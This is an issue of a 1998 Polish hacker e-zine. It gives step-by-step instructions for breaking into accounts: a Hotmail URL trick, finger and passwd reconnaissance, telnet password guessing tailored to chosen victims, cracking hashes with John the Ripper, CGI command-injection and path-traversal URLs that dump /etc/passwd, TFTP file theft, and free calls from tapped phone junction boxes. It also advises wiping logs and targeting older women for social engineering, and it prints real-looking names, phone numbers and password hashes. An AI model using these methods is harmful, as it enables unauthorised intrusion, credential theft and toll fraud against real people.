***      ***     ******       ******     ***    ***   ********       ******
***      ***    ********     ********    ***   ***    *********     ***
***      ***   ***    ***   ***    ***   ***  ***     ***    ***   ***
***      ***   ***    ***   ***          *** ***      ***    ***    ***
************   **********   ***          ******       *********      *****
************   **********   ***          ******       ******          *****
***      ***   ***    ***   ***          *** ***      *** ***            *** 
***      ***   ***    ***   ***    ***   ***  ***     ***  ***            ***
***      ***   ***    ***    ********    ***   ***    ***   ***          ***
***      ***   ***    ***     ******     ***    ***   ***    ***    *******


                       *****      *****     ******       ******
                       ******    ******    ********     ********
                       *** ***  *** ***   ***    ***   ***    ***
                       ***  ******  ***   ***    ***   ***
                       ***   ****   ***   **********   ***
                       ***          ***   **********   ***   ****
                       ***          ***   ***    ***   ***    ***
                       ***          ***   ***    ***   ***    ***
                       ***          ***   ***    ***    ********
                       ***          ***   ***    ***     ******


=============================================================================
Mag na sierpien/wrzesien 1998      Numer 04     http://www.kki.net.pl/hackers
=============================================================================


Spis tresci:
    1. Spis tresci
    2. Slowo wstepne
    3. Hotmail
    4. Zdobywanie wielu kont
    5. Phreak
    6. Linki
    7. Redakcja

-----------------------------------------------------------------------------
Wstep:


W poprzenim numerze pytalem ktora wersje (txt czy html) wolicie. Odpowiedzi
ktore nadeszly byly zarowno za wersja txt oraz html (z przewaga glosow za 
html), wiec mag nadal bedzie wydawany w obu wersjach. Wersja orginalna zawsze
jest wtorzona w wersji tekstowej a dopiero pozniej przetwarzana na html.
Magazyn jak mozna zauwazyc jest dwu-miesiecznikiem i nic nie wskazuje na to 
by sie to zmnienilo.
            
                                             Richgyver

ps. Programow juz nie bede zamieszczal do magazynu tylko bede je umieszczal
na stronie www (http://www.kki.net.pl/hackers). 


-----------------------------------------------------------------------------
Hotmail czesc 1:

Dosc znanym i dosc starym serverem udostepniajacym darmowe konta email jest
http://www.hotmail.com firmy Microsoft. Mozemy zalozyc sobie tam konto email
i miec do niego dostep przy pomocy przegladarki. Oczywiscie aby miec dostep
do swojego emaila musimy wpisac swoje haslo.... ale nie musimy. Jedna z 
metod jest wpisanie w pole adresu przegladarki:
   
               http://www.hotmail.com/cgi-bin/start/xxxxxxx
i w miejsce xxxxxx wpisac username (nazwe uzytkownika) czyli alias ktory
wystepuje przed znakiem @ w emailu danej osoby (xxxxxx@hotmail.com).
Czyli np. osoba ma adres email na serwerze hotmail:
                           zenek@hotmail.com     
to wpisujemy w adres (w przegladarce):
               http://www.hotmail.com/cgi-bin/start/zenek
Niestety ostatnio firma microsoft zwiekszyla troche zabezpeiczenia i
aby ta metoda dostac sie do konta ofiary musza byc spelnione nastepujace
warunki:
1. ofiara musiala kozystac ze swojego konto w ciagu ostatniej godziny
2. musimy miec ten sam adres IP co ofiara (wiec siedziec albo na tym samym
   komputerze co nasza "ofiara" lub uzywac tego samego servera proxy)
Te warunki troche nam zmniejszaja szanase dostania sie ta metoda do konto
naszej "ofiary"... ale nastepne mozliwosc w nastepnym numerze.

                                             Richgyver

-----------------------------------------------------------------------------
Zdobywanie wielu kont:

 czesc 2: Analiza zdobytych danych: netstat, finger,
          tftp, dziury w scriptach CGI-BIN...
	  Port surfing, wlamanie z wykorzystaniem
	  metody brutal force oraz po zlamaniu
	  hasla ze zdobytego pliku passwd
	  [ ewentualnie shadow ]...

=============================================================================

   Dobra, spotykamy sie juz po raz drugi. Mam nadzieje, ze
   kazdy zainteresowany zdobyl juz ( wykorzystujac metody z czesci 1 )
   informacje potrzebne nam do tego artykulu. Jest tam duzo
   informacji, ktorych sens postaram sie wam dalej wytlumaczyc.

*****************************   NETSTAT    **********************************

  Netstat ( czyli Network Statistic ) daje nam wiele ciekawych
  informacji, ktore mozemy wykorzystac potem do surfowania
  po portach ( obecnie czesciej wykonuje sie to za pomoca
  roznych skanerow, ale "wlasnoreczne" przeszukiwanie daje
  nam wiecej satysfakcji :) Zagladamy wiec w plik raportu,
  jaki stworzylismy wczesniej ( czesc 1 ). Powinno tam sie
  znajdowac cos takiego:

Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address          Foreign Address        (State)
tcp       0      0 *:673                  *:*                    LISTEN
tcp       0      0 *:8080                 *:*                    LISTEN
tcp       0      0 *:netbios-ssn          *:*                    LISTEN
tcp       0      0 *:nntp                 *:*                    LISTEN
tcp       0      0 *:auth                 *:*                    LISTEN
tcp       0      0 *:sunrpc               *:*                    LISTEN
tcp       0      0 *:pop3                 *:*                    LISTEN
tcp       0      0 *:www                  *:*                    LISTEN
tcp       0      0 *:finger               *:*                    LISTEN
tcp       0      0 *:domain               *:*                    LISTEN
tcp       0      0 *:time                 *:*                    LISTEN
tcp       0      0 *:smtp                 *:*                    LISTEN
tcp       0      0 *:telnet               *:*                    LISTEN
tcp       0      0 *:ftp                  *:*                    LISTEN
tcp       0      0 *:chargen              *:*                    LISTEN
tcp       0      0 *:netstat              *:*                    LISTEN
tcp       0      0 xxx.xxx.xxx.xxx:netstat ppp-rapxxx.konin:15558 ESTABLISHED
tcp       0      0 *:daytime              *:*                    LISTEN
tcp       0      0 *:systat               *:*                    LISTEN
tcp       1      0 xxx.xxx.xxx.:systat   ppp-rapxxx.konin:15546 TIME_WAIT
tcp       1      0 xxx.xxx.xxx.:systat   ppp-rapxxx.konin:15549 TIME_WAIT
tcp       1      1 xxx.xxx.xxx.xxx:1290  ppp-rapxxx.konin.:auth CLOSING
tcp       0      0 *:discard              *:*                    LISTEN
tcp       1      0 xxx.xxx.xxx.xxx:1288  ppp-rapxxx.konin.:auth TIME_WAIT
tcp       0      0 *:echo                 *:*                    LISTEN
tcp       1      0 xxx.xxx.xxx.xxx:1286  ppp-rapxxx.konin.:auth TIME_WAIT
tcp       0      0 *:printer              *:*                    LISTEN
tcp       0      0 *:shell                *:*                    LISTEN
tcp       0      0 *:login                *:*                    LISTEN
tcp       0      0 *:2049                 *:*                    LISTEN
udp       0      0 *:671                  *:*                    
udp       0      0 *:netbios-ns           *:*                    
udp       0      0 *:sunrpc               *:*                    
udp       0      0 *:3130                 *:*                    
udp       0      0 *:domain               *:*                    
udp       0      0 localhost:domain       *:*                    
udp       0      0 xxx.xxx.xxx.:domain	  *:*                    
udp       0      0 *:time                 *:*                    
udp       0      0 *:chargen              *:*                    
udp       0      0 *:daytime              *:*                    
udp       0      0 *:discard              *:*                    
udp       0      0 *:echo                 *:*                    
udp       0      0 *:ntalk                *:*                    
udp       0      0 *:syslog               *:*                    
udp       0      0 *:2049                 *:*                    
udp       0      0 *:biff                 *:*                    
raw       0      0 *:1                    *:*                    
Active UNIX domain sockets
Proto RefCnt Flags      Type            State           Path
unix  2      [ ]        SOCK_STREAM     CONNECTED       678
unix  2      [ ]        SOCK_STREAM     UNCONNECTED     679
unix  2      [ ]        SOCK_STREAM     CONNECTED       682
unix  2      [ ]        SOCK_STREAM     UNCONNECTED     687
unix  2      [ ]        SOCK_STREAM     CONNECTED       690

  ( wycialem ostatnia kolumne - user [ ale nie bylo w niej nic ciekawego ] )
  Sprobujmy wiec przeanalizowac, co tu mamy. 
  Pierwsza kolumna to ptotokul:
IP	- internet protocol, pseudo protocol number
ICMP	- internet control message protocol
GGP	- gateway-gateway protocol
TCP	- transmission control protocol
EGP	- exterior gateway protocol
PUP	- PARC universal packet protocol
UDP	- user datagram protocol
HMP	- host monitoring protocol
XNS-IDP	- Xerox NS IDP
RDP	- "reliable datagram" protocol
( najczesciej jest TCP [ Transmission Control Protocol ], lub UDP [ User
  Datagram Protocol ] ), dalej Recived-Q i Sended-Q ( ktore nie sa dla nas
  istotne ), Local Adress ( nazwa portu ), Foreign Adress ( adres komputera
  laczacego sie z danym portem ), state ( status portu ), user ( uzytkownik )
  
  Podstawowe porty, jakie powinienes znac to:

Nazwa:	    Nr.portu:	Usluga:
echo		7	Cokolwiek napiszesz host odpisze to samo
discard		9	/dev/null
systat		11	Uruchamia na serwerze komende ps -auwwx
daytime		13	Czas i data na hoscie
netstat		15	Wlasnie to uruchomiles :) ( network statistic )
chargen		19	Zwraca nam ciag znakow ASCII. Aby je zatrzymac - ^C
ftp		21	File Transfer Protocol ( wiadomo )
telnet		23	Telnet ( wiadomo )
smpt		25	Poczta ( uzywajac tego portu mozna wysylac fake maile )
time		37	Zwraca czas
domain		53	Nazwa serwera
finger		79	Informacje o uzytkownikach
http		80	Serwer WWW
login		513	Login :)
shell		514	Zdalny shell

  Teraz mozesz przeszukac serwer w poszukiwaniu czyis backdoors
  lub laczyc sie z odpowiednim portem i probowac zdobyc jak najwiecej
  danych. Kiedys mozna bylo wywolac przepelnienie stosu za pomoca
  fingera ( wykorzystywala to bakteria Morrisa ) a tym samym zdobyc roota.
  [ Wystepowalo to, gdy informacja podawana przez uzytkownika byla
    dluzsza niz 512 bajtow. Demon fingerd przepelnial stos i pozwalal
    na uruchomienie shella ]
  Po polaczeniu na port 79 ( finger ;) mozemy wywolac 1 komende,
  po czym zostajemy rozlaczeni. Jest to rownoznacze z wywolaniem:

% finger xxxxx@xxx.xxx.xxx.xxx

  ( lecz czasem podobno dzialaja takie komendy jak: help, ?, man 
    mi nie dzialaly, ale tak gdzies czytalem, chcecie to probujcie ;)

    [		        	 dla lamerow:			        ]
    [ laczenie z odpowiednim portem:  % telnet xxx.xxx.xxx.xxx nr.portu	]


*******************************   FINGER   **********************************

  Teraz znow o FINGERze, ale w nieco innej formie.
  Otoz zwraca nam on bardzo ciekawe informacje. W pliku
  raport stworzonym po przeczytaniu 1 czesci artykulu powinno
  znajdowac sie cos takiego:

....
[kinga.cyf-kr.edu.pl]
Login name: ucjaneck    (messages off)  In real life: Dariusz Janecki
Bldg: Uniwersytet, Work phone: 633 63 77w.229
Directory: /home/ucjaneck               Shell: /usr/bin/tcsh
On since May 16 15:55:23 on ttyp1 from eter213.ch.uj.ed
13 minutes Idle Time
No Plan.

Login name: eyolejni    (messages off)  In real life: Barbara Olejnik
Bldg: Akademia Ek, Work phone: 616 76 98
Directory: /home/eyolejni               Shell: /usr/bin/tcsh
On since May 16 15:51:18 on ttyp4 from pc8-153.ae.krako
2 minutes 31 seconds Idle Time
No Plan.
....

   Wszystko jest chyba jasne. Mamy prawdziwe imie i nazwisko
   tych ludzi, ich numery telefonow i kilka innych informacji.
   Finger jest jednak coraz czesciej wylaczany przez administratorow,
   w obawie przed zlymi hackerami i tzw. " system crackers "  :)
   Jest wiec wykomentowany z inetd.conf:

# finger        stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd -w
   
   Lub zamieniany na program, ktory po wywolaniu portu 79 zamiast 
   informacji o uzytkownikach wyswietli nam jakis napisik. Z ciekawszych,
   jakie znalazlem to:
....
[giovanni.wmsd.edu.pl]
Sorry, no bonus this time...

[service.amu.edu.pl]
Sorry, finger is locked

[shadow.put.poznan.pl]

Politechnika Poznanska                      Poznan University of Technology
Uczelniane Centrum Obliczeniowe             Computing Centre
-------------------------------             --------------------------------

Dostep do tego systemu jest                 Access to this system is limited
ograniczony wylacznie dla komputerow        only for hosts authorized by
autoryzowanych przez Uczelniane Centrum     Computing Centre of Poznan 
Obliczeniowe Politechniki Poznanskiej       University of Technology


		   unknown@ppp-rapxxx.konin.tpnet.pl :)

nie ma autoryzacji zezwalajacej             is not authorized to access
na dostep do systemu orion.put.poznan.pl    orion.put.poznan.pl host

   
		   hostmaster@orion.put.poznan.pl

....

To ostatnie bylo chyba dzielem jakiegos wrappera ograniczajacego
dostep do tej uslugi ( ale i tak mi sie podobalo :).

   Na wielu hostach jednak finger jeszcze dziala i mozna probowac.

********* /etc/passwd ( np. z plikow stworzonych przez monk.sh ) ************

   Podobnych informacji co finger moze nam dostarczyc plik /etc/passwd
   nawet jesli hasla sa shadowane. Wyglada to tak:

  ....
 stink:x:1048:100:Gary Fisher,,415-306-9466,:/usr/home/stink:/bin/tcsh
  ....
 ion:x:1051:100:Matt Glaspie,ION,810-669-1564,:/usr/home/ion:/bin/sh
  ....
 
 A wiec otrzymujemy prawie te same informacje, co przy uzyciu fingera:

 Login: stink
 In real life: Gary Fisher
 Organizacja: -
 Numer telefonu: 415-306-9466
 Katalog macierzysty: /usr/home/stink
 Shell: /bin/tcsh
 UID=1048
 GID=100  

 Login:ion
 In real life: Matt Glaspie
 Oranizacja: ION
 Numer telefonu: 810-669-1564
 Katalog macierzysty: /usr/home/ion
 Shell: /bin/sh
 UID=1051
 GID=100

   Widzimy rowniez, ze wszyscy uzytkownicy naleza do grupy o GID=100
   W tym przypadku numery telefonow i firma nie maja dla nas
   wiekszej wartosci, ale jesli mamy plik passwd z polskiego
   serwera, np.
 ....
 pelka:x:558:110:Ania Pelka,OINiD,826-40-47,664-42-79:/home/PELKA:/bin/tcsh
 ....
 kopyszew:x:593:110:Eugeniusz Kopyszew,
 UW Wydz.Polonistyki,10-32-31(p.911),10-32-31(p.911):/home/kopyszew:/bin/bash
 ....
   No coz - tutaj chyba wszystko jest jasne...

  Do czego moga nam sie przydac informacje zdobyte fingerem ?
  Otoz najprostrza forma dostania sie na czyjes konto jest
  atak sposobem brutal force ( czyli zgadywanie hasel sposobem
  chybil-trafil ). Wbrew pozorom akcja taka ma duze szanse 
  powodzenia. Wywolujemy wiec klienta telnetu, laczymy sie 
  z serwerem i mozemy probowac zgadnac haslo wykorzystujac:
  login, imie, nazwisko, imie od konca, nazwisko od konca,
  polaczenie imienia z nazwiskiem ( 3 litery imienia + 3 nazwiska,
  itp. ), wszystko to uzupelnione cyfra 1, 0 ( pozostale
  rzadko sie zdarzaja ), lub kilkoma cyframi ( np. 123, 098,
  997, 998, 999 ), wykorzystujemy tez numer telefonu i inne
  informacje ( strona WWW ). Kiedys udalo mi sie
  w ten sposob zlamac kilka kont.
  Calosc wygladala mniej wiecej tak:
  
% telnet
telnet> op xxx.xxx.xxx.xxx
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx
Escape character is '^]'.
 
FreeBSD (xxx.xxx.xxx.xxx) (ttyp0)
 
login: ofiara
Password:					/ tu wpisywalem hasla
Login incorrect					/ ale tego nie widac :)
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Login incorrect
login: ofiara
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
	The Regents of the University of California.  All rights reserved.
 
FreeBSD 2.2.6-BETA (hoth_ipf) #0: Sun Mar 15 13:03:32 MET 1998
 
Uzytkownik poprzez zalogowanie sie na swoje konto deklaruje, ze zapoznal
sie z Regulaminem oraz ze wyraza zgode na wszelkie formy monitorowania
swojej dzialalnosci i na wykorzystanie logow systemowych we wszelkich
sprawach administracyjnych, cywilnych i karnych.
 
 
Aktualny Regulamin:                     /regulamin
Zalecenia Bezpieczenstwa:               /secure
Komunikaty Administratora:              /admin
 
Welcome to FreeBSD!
 
You have mail.
tset: terminal type linux is unknown
Terminal type? ^D

Technological progress has merely provided us with more efficient means
for going backwards.
		-- Aldous Huxley
xxxx: {1} ls
allegro.cfg     mail            public_html

xxxx: {2}

  To jest zmieniony troche log sesji, a zamiescilem go
  po to, aby ukazac, ze zgadniecie czyjegos hasla
  jest naprawde mozliwe.

  ( zalaczam programik, ktory robi to za nas - brute.c )
  ( uzywamy go ( po kompilacji :) w polaczeniu ze slownikiem )
  ( $ brute ofiara slownik adres.serwera 23 )

  Trzeba natomiast pamietac, ze wszelkie bledne proby logowania
  sie zostana odnotowane w logach. Trzeba wiec albo nie przesadzac
  z " napastowaniem " serwera ( po 2-3 proby dziennie ), albo
  po dostaniu sie do systemu zdobyc roota i wyczyscic logi :)
  
   Inna sprawa jest, ze ludzie sa naiwni i mozna od nich
   wyludzic haslo nawet przez telefon  :)))

  Ja osobiscie nie lubie tego typu atakow, ale w chwili
  desperacji ( gdy wszystkie znane dziury w serwerze sa
  zapchane ) mozna probowac i tak. Trzeba oczywiscie
  dobrac odpowiednio ofiare ( najlepsza jest kobieta,
  starsza [ np. bibliotekarka, kustosz muzeum ] )
  Naprawde mozna sie wiele dowiedziec o czlowieku przegladajac
  strony WWW i laczac znalezione tam informacje np. z FINGERem.
  No i trzeba to sprytnie wykorzystac...


  Plik passwd mozemy obejrzec majac dostep do systemu za pomoca komendy
  cat ( jesli hackujemy pod SHITem 95 mozemy ustawic logowanie
  sesji i obejrzec je na spokojnie potem ). Nie chce mi sie tu rozpisywac
  na temat sciagania hasel, gdy jestesmy juz w systemie,
  bo nie o tym jest artykul. Grunt ze mozna je sciagnac za pomoca ftp
  ( ale nie anonimowego, bo wtedy glownym katalogiem dla nas nie jest /	)
  ( lecz /home/ftp, tak wiec widziany przez nas plik /etc/passwd 	)
  ( to w rzeczywistosci	/home/ftp/etc/passwd [ chociaz czasem 		)
  ( administratorzy sa na tyle glupi, ze przegrywaja plik /etc/passwd	)
  ( do /home...	]						        )

% ftp xxx.xxx.xxx.xxx
Connected to xxx.xxx.xxx.xxx
220 xxx.xxx.xxx.xxx FTP server ready.
Name (xxx.xxx.xxx.xxx:twoj_login): nazwa_konta
Password: haslo_dla_tego_konta
ftp> get /etc/passwd /tmp/mam.je.u.siebie
....
ftp> quit
% _

  Mozna tez wyslac plik passwd na jakies swoje trefne konto pocztowe.
  Itp., itd. - gdy juz mamy konto, sposobow jest naprawde full...

  Gdy hasla nie sa shadowane ( co obecnie zadko sie zdarza,
  choc jakis miesiac temu znalazlem taki system, [ a tydzien temu drugi :) ])
  znajduja sie w pliku /etc/passwd w postaci zakodowanej. Wyglada
  to tak:

....
markl:93IGeQL45BmCk:549:100:Mark Lavery:/home/markl:/bin/tcsh
urgent:39Li4tqFigKbA:550:100:Jerry Burger:/home/urgent:/bin/tcsh
getitback:614QgdDEz8N2k:551:100:Gil Ziniga:/home/getitback:/bin/tcsh
....

  Gdzie druga czesc linii ( po dwukropku ) to haslo ( zakodowane ).
  Aby je zlamac trzeba uzyc programu lamiacego oraz slownika.
  Programy takie sa ogolnie dostepne ( najlepsze to:
  Cracker Jack, czy John the Ripper ). Dzialaja one
  pod DOSem ( chociaz widzialem wersje Johna pod Unixa ).
  W celu zlamania hasla musimy miec liste prawdopodobnych hasel
  ( tzw. slownik ;). Na jakiej zasadzie dziala program lamiacy ?
  Zeby to zrozumiec nalezaloby najpierw zastanowic sie
  w jaki sposob hasla sa kodowane przez systemy unixowe.
  Otoz system koduje haslo ( max. 8 znakowe ) do 4096
  wzorcow ( z ktorych kazdy ma po 13 znakow ) i jeden
  z takich wzorcow zapisuje w pliku passwd lub shadow.
  Mechanizm kodowania hasel jest jednostronny, a to oznacza,
  ze hasel tych nie da sie odkodowac. Tak wiec programy
  takie jak John The Ripper aby odkodowac haslo potrzebuja
  listy slow, ktore kolejno koduja ( uzywajac tych samych
  algorytmow co Unix ) do 4096 kombinacji i kolejno
  przyrownuja do tego, ktore znajduja w pliku passwd.
  Jesli oba zakodowane hasla sa identyczne, oznacza
  to, ze znalezlismy haslo ( co sygnalizowane jest
  cudownym beeeep z PC-Speaker'a ;)

  OK. Jak uzywac Johna, czy Jacka?
  Ja osobiscie wole John the Ripper'a (v1.4). Aby go uruchomic przeciwko
  plikowi z haslami piszemy najpierw:

C:\JOHN> john.com -beep -single -pwfile:passwd

Co powoduje lamanie hasel bazujac na loginach, imionach i nazwiskach
uzytkownikow ( oraz ich przeksztalceniach ). Wszelkie przeksztalcenia
mozemy ustalic w pliku john.ini. W pliku john.pot znajduja sie
zlamane hasla, a w restore - dane ktore po przerwaniu programu pozwalaja
nam zaczac od ostatniego sprawdzonego slowa [ C:\JOHN> john.com -restore ]
Aby sprawdzic plik passwd z naszym slownikiem uruchamiamy:

C:\JOHN> john.com -beep -pwfile:passwd -wordfile:slownik

Ale lepiej jest odrazu wpisac:
C:\JOHN> john.com -beep -rules -pwfile:passwd -wordfile:slownik

Co spowoduje przeksztalcanie slow z naszej listy ( pierwsza litera
wielka, ostatnia, +cyfry, tworzenie form w czasie przeszlym
( +ed ), liczby mnogiej ( +s ) i inne ). Slowniki mozemy
sobie tworzyc sami, wyciagac slowa z plikow ( program extract.exe
z pakietu Cracker Jacka ), lub sciagnac z jakiejs fajnej strony WWW ;)

Co do Cracker Jacka to sprawa jest duzo prostrza. Piszemy:
C:\CJACK> jack.exe passwd slownik

i dziala. Podobnie jak w Johnie jack.pot - info o zlamanych
haslach, restore - dane do wznowienia sesji. 
Acha... wznawianie sesji:
C:\CJACK> jack.exe -restore

 Jesli nie mozemy zlamac hasla ( nie mamy go w slowniku nawet
 po licznych permutacjach ), a jest ono dla nas bardzo wazne
 ( np. haslo root'a ), mozemy sprobowac zlamac je metoda
 brutal force ( sprawdzic wszelkie mozliwe kombinacje liter ).
 Do tego celu mozecie uzyc mojego programiku o nazwie
 BrutaLDictor, ktory zalaczam do artykulu ( opis w pliku bdictor.txt )

  Gdy program zlamie nam haslo mozemy sie zalogowac
  na to konto uzywajac zdobytego hasla.


*****************   SCRIPTY CGI-BIN   ************************

  Ciekawsza rzecza jest zdobycie pliku z haslami bez dostepu 
  do konta w systemie. Mozna to np. zrobic wykorzystujac
  dziury w scriptach CGI-BIN z HTTPD. Sa one dosc stare i bardzo
  rzadko dzialaja :( 
  
  I znow mozemy zdobyc albo plik z haslami zakodowanymi,
  albo z "x" lub "*" w miejscu hasel ( oznacza to, ze
  hasla sa shadowane i znajduja sie najczesciej w pliku
  /etc/shadow, ale np. na FreeBSD 2.2.6 sa w /etc/master.passwd,
  ich lokalizacje w roznych systemach podam na koncu artykulu ).
 
  A oto kilka bardziej znanych dziur w tych scriptach.
  Przypominam, ze uruchamiamy je z poziomu przegladarki
  ( np. IE czy Netscape pod Windowsem, czy lynx pod linuxem ).

  Wiec wyglada to tak:

1). http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

  gdzie:
  Linie rozpoczynamy od:  	%0a
  Zamiast spacji wstawiamy:	%20

  Mozemy w ten sposob uruchomic dowolna komende unixa, np.
  http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0aid
  http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/services
  http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ident.conf
  http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/messages
  http://xxx.xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/var/log/syslog

  i inne w celu lepszego zapoznania sie z serwerem.
  Nie mozna jednak uzywac mechanizmu potokow (|), przepisywac shelli,
  dodawac + + do .rhosts , itp.

  Pamietac nalezy rowniez, ze nasza dzialalnosc jest odnotowywana
  w logach.

  Dalszy komentarz jest chyba zbedny - wyswietlaja plik /etc/passwd	:)
    [ oczywiscie w ten sposob mozna obejrzec dowolny plik na serwerze ] 

2). http://xxx.xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd

3). http://xxx.xxx.xxx.xxx/cgi-bin/view-source?../../../../../../etc/passwd

4). http://xxx.xxx.xxx.xxx/cgi-bin/campas?%a/bin/cat%0a/etc/passwd


  A te dzialaja na serwerach opartych na IRiX'ie:

5). http://xxx.xxx.xxx.xxx/cgi-bin/wrap?/etc         / pokazuje zawartosc
						     / katalogu /etc
						     / i analogicznie inne

6). http://xxx.xxx.xxx.xxx/cgi-bin/webdist?distloc=;cat%20/etc/passwd
 
7). http://xxx.xxx.xxx.xxx/cgi-bin/handler/useless_shit;cat    
	/etc/passwd|?data=Download

  W ten sam sposob mozna probowac sciagnac /etc/shadow, ale
  szanse male.

  Do tego artykulu dodam przerobiona przeze mnie wersje
  scriptu monk.sh z pakietu XENOLITH. Testuje ona
  wszyskie wymienione wyzej dziury. 
  ( nazwa: cgitest )
  ( uruchomienie: % cgitest lista.serwerow )

*********************    TFTP    *****************************

W pliku z raportem z polaczen z TFTP zapewne nie znajdziesz
duzo. Jesli jednak znajdziesz serwer, z ktorym mozesz
sie polaczyc na port 69, uruchom klienta tftp i sprobuj
sciagnac plik passwd.

% tftp
tftp> connect xxx.xxx.xxx.xxx
tftp> get /etc/passwd /tmp/mam.je.u.siebie
tftp> quit

Jesli operacja taka sie powiedzie ( nie sa nalozone restrykcje
co do katalogu ) - masz hasla.


=============================================================================

W nastepnym numerze:
Sendmail, NFS, informacje z portu 11 ( systat ) i moze cos jeszcze ;)

=============================================================================

Pozdrowienia dla: KeenU'a, Kubi'ego, Dante, Sir D, BoBo i pozostalych.

	" Nil mortalibus ardui (e)st... " - Horacy

                                                    arkth

-----------------------------------------------------------------------------
Phreak:

       Chcialem na poczatku wyjasnic, coz to takiego oznacza slowo "PHREAK". 
Oznacza to po prostu proby/czynnosc zwiazane z mozliwosciami dzwonienia przez
telefon i nie placac za to. Jest wiele sposobow na wykonywanie ww. czynnosci.
Kiedys (jakies dziesiec lat temu) bylo to dosc proste, dzis Telekomunikacja 
Polska przeznacza dosc duze pieniadze na to by kazdy placil wszystkie rozmowy
telefoniczne. Ale tu nic na razie o tym nie bedzie, chcialbym tu napisac jak
TPSA (Telekomunikacja Polska Spolka Akcyjna) dba o to aby za kazda wykonana 
rozmowe ktos zaplacil (ale kto to juz ich nie interesuje).
       Otoz jak ktos nie ma co robic z pieniedzmi to moze sobie podlaczyc do
domu dwie linie telefoniczne (dwa numery telefoniczne). Jednym z takich ludzi
jestem ja (choc nie mam za duzo pieniedzy). Chodzi o to, ze ten drugi telefon
jest podlaczony do takiej malej skrzynki, ktora znajduje sie na mojej klatce
schodowej. Wszystko niby dobrze tylko po pewnym czasie na tej lini slyszalem
straszne trzaski, wiec dzwonie do TPSA, a na drugi dzien przyszedl jakis 
facet. I co? I ten nie pozorny facet wzial srubokret, odkrecil dwie skrobki,
podlaczyl dwa kabelki do swojej sluchawki i juz dzwonil na moj koszt. Czyli
mogl kazdy przyjsc w nocy, zrobic to samo i dzwonic sobie na numery typu 
0700 na moj koszt. Dwie plastikowe srobki to jest zabezpieczenie przed utrata
tysieczy zlotych jakie w taki sposob mozna komus nabic na liczniku w TPSA? 
Co z tego wynika, to ze: nie nalezy dokladac sobie nowych lini telefonicznych
(jesli ktos mieszka w bloku) oraz gdy chcemy sobie podzwonic na numer numery
0700 to nalezy tylko poszukac takiej skrzynki i podlaczyc tam sluchawke.
Kiedys slyszalem w "informacjach" telewizyjnych, ze ktos sadowal sie z TPSA
wlasnie o to czy ww. typ skrzynki byl dobrze zabezpieczony (ktos mu nabil 
licznik telefoniczny), podobno TPSA przegrala sprawe. To tyle na dzis.

                                                             nikito


-----------------------------------------------------------------------------
Linki do interesujacycg stron:
-strony zwiazane z h/p/c/v/a
 -http://www.kki.net.pl/hackers
 -http://www.inet.com.pl/rafal
 -http://hack.netpol.pl
 -http://kki.net.pl/glider
 -http://www.kki.net.pl/~masher

Twoja strona tez moze znalezc sie w tym spisie. Musisz najpierw:

1. Umiescic ten "kawalek" kodu html na swojej stronie:

<-- Poczatek odnosnika do hackersmag -->
<-- Koniec odnosnika --> 2. Napisac do nas email (zadresowany do hackers@kki.net.pl) z informacja o adresie twojej strony. Jesli wszystko zrobiles poprawnie twoja strona zostanie umieszczona w naszym spisie najciekawszych stron. ----------------------------------------------------------------------------- W sklad redakcja tego maga wchodza: -Richgyver (hackers@kki.net.pl) -Lukas (chopin@friko.onet.pl) -Arkth (arkth@friko4.onet.pl) -nikito (superc@friko.sos.com.pl) Jesli chcial cos napisac do naszego maga (a nam to sie by spodobalo) lub napisales juz jakis tekst to wyslij to na adres: hackers@kki.net.pl ze swoimi danymi. Kazdy taki piszacy do naszego maga dostanie wynagrodzenie (pieniadze). Zawsze wszystkie numery poprzednie oraz najnowszy numer naszego magazynu mozesz sciagnac ze strony: http://www.kki.net.pl/hackers Mozesz do nas napisac list, nasz email: hackers@kki.net.pl Wszystkie materialy i informacje zawarte sa tu jedynie w celach *EDUKACYJNYCH* i nikt z redakcji nie ponosi *ZADNEJ* odpowiedzialnosci, za zle wykorzystanie podanych tu informacji... /Koniec pliku tekstowego./